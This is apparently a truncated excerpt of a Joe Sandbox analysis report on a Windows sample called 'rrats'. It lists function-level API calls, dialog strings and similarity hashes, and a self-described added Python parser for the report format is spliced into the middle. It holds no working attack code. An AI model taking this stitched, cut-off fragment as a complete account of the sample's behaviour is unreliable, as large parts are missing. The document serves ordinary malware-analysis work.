                                                              Similarity
                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                              • String ID: $%s$@%s
                                                              • API String ID: 562999700-834177443
                                                              • Opcode ID: f62116c7d6ea670fe366cbade8961c3aabde9d8f7ee0169b9ee8000a91c03cb7
                                                              • Instruction ID: 8262c66e347a6dbbd2603ca57d35e7488e3e0309336fb9266e1f3ee48ec31776
                                                              • Opcode Fuzzy Hash: f62116c7d6ea670fe366cbade8961c3aabde9d8f7ee0169b9ee8000a91c03cb7
                                                              • Instruction Fuzzy Hash: DE21D57294024DAEDB20EEB4CC05FDF3BA8AF02308F040022FA22965A2E631D648DB51
                                                              APIs
                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00CAAC5A,00000008,?,00000000,?,00CAD22D,?,00000000), ref: 00CB0E85
                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00CAAC5A,00000008,?,00000000,?,00CAD22D,?,00000000), ref: 00CB0E8F
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00CAAC5A,00000008,?,00000000,?,00CAD22D,?,00000000), ref: 00CB0E9F
                                                              Strings
                                                              • Thread pool initialization failed., xrefs: 00CB0EB7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                              • String ID: Thread pool initialization failed.
                                                              • API String ID: 3340455307-2182114853
                                                              • Opcode ID: ee5a0956578e84c6126998c001c68de95831d678edf8404ee8578e174488d58f
                                                              • Instruction ID: e1514ccabb70d98b800b5c7a0e80e94535dca0810ddaa1668dbdaed94097b7c0
                                                              • Opcode Fuzzy Hash: ee5a0956578e84c6126998c001c68de95831d678edf8404ee8578e174488d58f
                                                              • Instruction Fuzzy Hash: 001151B16407499FC3215F6A9C84AABFBECEBA5754F24482EF1DAC3200D671AA408B50
                                                              APIs
                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                              • EndDialog.USER32(?,00000001), ref: 00CBB2BE
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00CBB2D6
                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00CBB304
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: GETPASSWORD1
                                                              • API String ID: 445417207-3292211884
                                                              • Opcode ID: 3217e3f9a2751000a8428d5b113db9a81d066e2a2f803916e73fb2b612483405
                                                              • Instruction ID: e051b308fb5e1a2865cc015da1d5b982a2200ed9b979200e56e399f243c5705c
                                                              • Opcode Fuzzy Hash: 3217e3f9a2751000a8428d5b113db9a81d066e2a2f803916e73fb2b612483405
                                                              • Instruction Fuzzy Hash: 4A11A132900219B6DF219EA59D49FFF3B6CEB1A710F000021FA45F6194C7E4AE4597B2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                              • API String ID: 0-56093855
                                                              • Opcode ID: f614d5e8d3ea2c83310fc129119a04e29f673bb04d801767cc1925a0c2bd7641
                                                              • Instruction ID: 652e798d309e0114abc1cbce5fdfac8c3427ad916123424a2d645cfd8cfb6078
                                                              • Opcode Fuzzy Hash: f614d5e8d3ea2c83310fc129119a04e29f673bb04d801767cc1925a0c2bd7641
                                                              • Instruction Fuzzy Hash: ED01B176604285AFDB118FA5FC84BEE7BA8F708344F000426F94AC72B0E6309954EBB0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              • API String ID: 1036877536-0
                                                              • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                              • Instruction ID: 3ddc79173d923570fd32f8bc8c14c8ed3518477e9611317a73fea3d610c3c7d2
                                                              • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                              • Instruction Fuzzy Hash: D6A16A729007869FEB21CF28C895FAEBBE5EF51310F2841ADE4969B281C634DE41C751
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00CA7F69,?,?,?), ref: 00CAA3FA
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00CA7F69,?), ref: 00CAA43E
                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00CA7F69,?,?,?,?,?,?,?), ref: 00CAA4BF
                                                              • CloseHandle.KERNEL32(?,?,?,00000800,?,00CA7F69,?,?,?,?,?,?,?,?,?,?), ref: 00CAA4C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: File$Create$CloseHandleTime
                                                              • String ID:
                                                              • API String ID: 2287278272-0
                                                              • Opcode ID: bace8473ae94c089d4813395f167cd689db05f07404f87ade9b682ae54c19f0a
                                                              • Instruction ID: 349edb6052ebd4d0dd0aa31a505e8a536f7fb0e840387caed429cb4a93507273
                                                              • Opcode Fuzzy Hash: bace8473ae94c089d4813395f167cd689db05f07404f87ade9b682ae54c19f0a
                                                              • Instruction Fuzzy Hash: D641BE312483829AD731DF24DC55BEEBBE4AB86708F044919F5E193190D7A4EB48DB53
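The function entries in this part of the report share one fixed layout: an APIs list whose items read Api.MODULE(args), ref: call-site address (some prefixed with "Part of subcall function <addr>:", and LIBCMT items carrying no argument list), followed by Similarity fields such as API ID, String ID and Instruction Fuzzy Hash. As an added example, not part of the Joe Sandbox report and not Joe Sandbox code, the following Python parses text in that layout into records so that all call sites of a given API can be listed, subcall lines can be separated from a function's own calls, and entries can be grouped by fuzzy hash. The sample is constructed from lines visible on this page and recombined into three short entries; the field names it recognises are only those shown here, and the API ID and hash values are carried through as printed, not recomputed.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Constructed sample: API lines and Similarity fields copied from entries on this
# page and recombined into three short function entries; not tool output.
SAMPLE = """\
APIs
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00CA7F69,?,?,?), ref: 00CAA3FA
• SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00CA7F69,?,?,?,?,?,?,?), ref: 00CAA4BF
• CloseHandle.KERNEL32(?,?,?,00000800,?,00CA7F69,?,?,?,?,?,?,?,?,?,?), ref: 00CAA4C6
• API ID: File$Create$CloseHandleTime
• String ID:
• Instruction Fuzzy Hash: D641BE312483829AD731DF24DC55BEEBBE4AB86708F044919F5E193190D7A4EB48DB53
APIs
• GetDC.USER32(00000000), ref: 00CBA666
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00CBA675
• ReleaseDC.USER32(00000000,00000000), ref: 00CBA691
• __freea.LIBCMT ref: 00CCCA79
• API ID: CapsDevice$Release
• Instruction Fuzzy Hash: 66E0EC71943721ABD2615F61AC5DB8B3E58EB05B52F014501FB0DDA2D0DB6486048BB1
APIs
  • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
• EndDialog.USER32(?,00000001), ref: 00CBB2BE
• GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00CBB2D6
• API ID: ItemText$DialogWindow
• String ID: GETPASSWORD1
• Instruction Fuzzy Hash: 4A11A132900219B6DF219EA59D49FFF3B6CEB1A710F000021FA45F6194C7E4AE4597B2
"""

# One API line: optional "Part of subcall function <addr>:" prefix, Api.MODULE,
# an optional argument list (LIBCMT items have none), then "ref: <call site>".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: str                          # call-site address as printed in the report
    subcall_of: Optional[str] = None  # callee address when this is a subcall line

@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    instruction_fuzzy_hash: str = ""

def parse_entries(text: str) -> List[FunctionEntry]:
    """One FunctionEntry per 'APIs' heading; text before the first heading is ignored."""
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None or not line:
            continue
        m = API_RE.match(line)
        if m:
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            cur.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"].upper(), m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue  # section headings and fields this parser does not use
        key, val = m["key"].strip(), m["val"].strip()
        if key == "API ID":
            cur.api_id = val
        elif key == "String ID":
            cur.string_id = val
        elif key == "Instruction Fuzzy Hash":
            cur.instruction_fuzzy_hash = val
    return entries

def direct_api_names(entry: FunctionEntry) -> Set[str]:
    """APIs called from the function body itself, ignoring 'Part of subcall' lines."""
    return {c.api for c in entry.calls if c.subcall_of is None}

def call_sites(entries: List[FunctionEntry], api: str) -> List[str]:
    """Call-site addresses across all entries that invoke the named API."""
    return [c.ref for e in entries for c in e.calls if c.api == api]

def index_by_fuzzy_hash(entries: List[FunctionEntry]) -> Dict[str, List[FunctionEntry]]:
    """Group entries by Instruction Fuzzy Hash, one of the values in the Similarity block."""
    out: Dict[str, List[FunctionEntry]] = {}
    for e in entries:
        if e.instruction_fuzzy_hash:
            out.setdefault(e.instruction_fuzzy_hash, []).append(e)
    return out
```

Running parse_entries over a whole report section pasted into SAMPLE makes it possible to ask, for example, which call sites reach SetFileTime after CreateFileW, or which entries share an Instruction Fuzzy Hash with a function seen in another sample. The parser deliberately keeps subcall lines but marks them, since the report attributes those calls to a callee address rather than to the function whose entry they appear in.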
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID:
                                                              • API String ID: 176396367-0
                                                              • Opcode ID: 4cc1e7bc8c164af0b1b850ec39ce8d053e31a057553ba7d16ce7a4d172abeab0
                                                              • Instruction ID: e6e9339e5ef908823efbe2301ab14b33c31b6b0292d7379b13629297f1f66f90
                                                              • Opcode Fuzzy Hash: 4cc1e7bc8c164af0b1b850ec39ce8d053e31a057553ba7d16ce7a4d172abeab0
                                                              • Instruction Fuzzy Hash: 874191B190166A9BCB259F68CC4AAEF7BBCEF01310F04412DFD45F7245DA30AE558BA4
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,00CC47C6,00000000,00000000,00CC57FB,?,00CC57FB,?,00000001,00CC47C6,2DE85006,00000001,00CC57FB,00CC57FB), ref: 00CCC9D5
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CCCA5E
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00CCCA70
                                                              • __freea.LIBCMT ref: 00CCCA79
                                                                • Part of subcall function 00CC8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC4286,?,0000015D,?,?,?,?,00CC5762,000000FF,00000000,?,?), ref: 00CC8E38
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: 05bfaa3c587a2f1956aac6348e8c8ebb939b801d88d3f1d750db98fe0980bef6
                                                              • Instruction ID: 3239e2e265ef38366ee5f83e23f95c747b8faab11ce68b76d6c535ac439fe31f
                                                              • Opcode Fuzzy Hash: 05bfaa3c587a2f1956aac6348e8c8ebb939b801d88d3f1d750db98fe0980bef6
                                                              • Instruction Fuzzy Hash: 3431AE72A0021AABDF25DF65CC95EAE7BA5EB01310F04412DFC18E6250E735DE51EB90
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 00CBA666
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CBA675
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CBA683
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00CBA691
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1035833867-0
                                                              • Opcode ID: c12ea386b1e01fdf0297a1fe8422dfdef6d2d27461a53b8a4500113eebcb19b0
                                                              • Instruction ID: 316bd8c15f707d4b20bf655313e5955d14e36be3890575d50a8861fb2c515eb7
                                                              • Opcode Fuzzy Hash: c12ea386b1e01fdf0297a1fe8422dfdef6d2d27461a53b8a4500113eebcb19b0
                                                              • Instruction Fuzzy Hash: 66E0EC71943721ABD2615F61AC5DB8B3E58EB05B52F014501FB0DDA2D0DB6486048BB1
                                                              APIs
                                                                • Part of subcall function 00CBA699: GetDC.USER32(00000000), ref: 00CBA69D
                                                                • Part of subcall function 00CBA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CBA6A8
                                                                • Part of subcall function 00CBA699: ReleaseDC.USER32(00000000,00000000), ref: 00CBA6B3
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00CBA83C
                                                                • Part of subcall function 00CBAAC9: GetDC.USER32(00000000), ref: 00CBAAD2
                                                                • Part of subcall function 00CBAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00CBAB01
                                                                • Part of subcall function 00CBAAC9: ReleaseDC.USER32(00000000,?), ref: 00CBAB99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ObjectRelease$CapsDevice
                                                              • String ID: (
                                                              • API String ID: 1061551593-3887548279
                                                              • Opcode ID: ff3c42af5c05f546096d9e7c92fa3e4862dac8d3885f6a4489b5b26185f4a123
                                                              • Instruction ID: 24283c795ebf55ba311687a479f2e4238c5e0338bb1ba2ea799c88d1ce6d3c80
                                                              • Opcode Fuzzy Hash: ff3c42af5c05f546096d9e7c92fa3e4862dac8d3885f6a4489b5b26185f4a123
                                                              • Instruction Fuzzy Hash: E491DFB1608354AFD610DF25D848A6BBBE8FFC9701F00491EF59AD3261DB31A945CF62
                                                              APIs
                                                              • _free.LIBCMT ref: 00CCB324
                                                                • Part of subcall function 00CC9097: IsProcessorFeaturePresent.KERNEL32(00000017,00CC9086,00000000,00CC8D94,00000000,00000000,00000000,00000016,?,?,00CC9093,00000000,00000000,00000000,00000000,00000000), ref: 00CC9099
                                                                • Part of subcall function 00CC9097: GetCurrentProcess.KERNEL32(C0000417,00CC8D94,00000000,?,00000003,00CC9868), ref: 00CC90BB
                                                                • Part of subcall function 00CC9097: TerminateProcess.KERNEL32(00000000,?,00000003,00CC9868), ref: 00CC90C2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                              • String ID: *?$.
                                                              • API String ID: 2667617558-3972193922
                                                              • Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                                                              • Instruction ID: 81c9045d908c77bb187d31bcd0056ce1bacbba04f1ddff6dc894f9df375c15be
                                                              • Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                                                              • Instruction Fuzzy Hash: 7F517F71E0010AAFDF14DFA8C882EADBBB5EF58310F25816DE854E7351EB319E019B50
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA75E3
                                                                • Part of subcall function 00CB05DA: _wcslen.LIBCMT ref: 00CB05E0
                                                                • Part of subcall function 00CAA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CAA598
                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA777F
                                                                • Part of subcall function 00CAA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA501
                                                                • Part of subcall function 00CAA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA532
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                              • String ID: :
                                                              • API String ID: 3226429890-336475711
                                                              • Opcode ID: e32617a30bd0f8192b37a8558b60ac68edb3e78302be050a7b868eb510d78660
                                                              • Instruction ID: 600ff1adc45023a5dfd324b8f9262b60fbe0551cf3a945d4ef0b0dd8c3312593
                                                              • Opcode Fuzzy Hash: e32617a30bd0f8192b37a8558b60ac68edb3e78302be050a7b868eb510d78660
                                                              • Instruction Fuzzy Hash: 364160B1801159AAEF25EB64CC5AEEEB37CEF56304F004196B609A2092DB745F88DF61
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: }
                                                              • API String ID: 176396367-4239843852
                                                              • Opcode ID: f2f01826acc8fa5eba0398b833c9e90aafa8da3ff4c9c4cd261b4d8777d3673e
                                                              • Instruction ID: e284b9ec8fd151cfe9087dbd3e340fd29608394d1ba10e8e57ce9083df59d509
                                                              • Opcode Fuzzy Hash: f2f01826acc8fa5eba0398b833c9e90aafa8da3ff4c9c4cd261b4d8777d3673e
                                                              • Instruction Fuzzy Hash: 3D21F07290435A5AD731EA64D845FABB3ECEF91750F04042EF640C3242EBA4DE4C93A3
                                                              APIs
                                                              • IsWindowVisible.USER32(0001046A), ref: 00CBDDDC
                                                              • DialogBoxParamW.USER32(GETPASSWORD1,0001046A,00CBB270,?,?), ref: 00CBDE18
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: DialogParamVisibleWindow
                                                              • String ID: GETPASSWORD1
                                                              • API String ID: 3157717868-3292211884
                                                              • Opcode ID: 09c2c1d4ad5c7305809f6b205369e36697ddb82b62986ae29cce4a3e2646dcfa
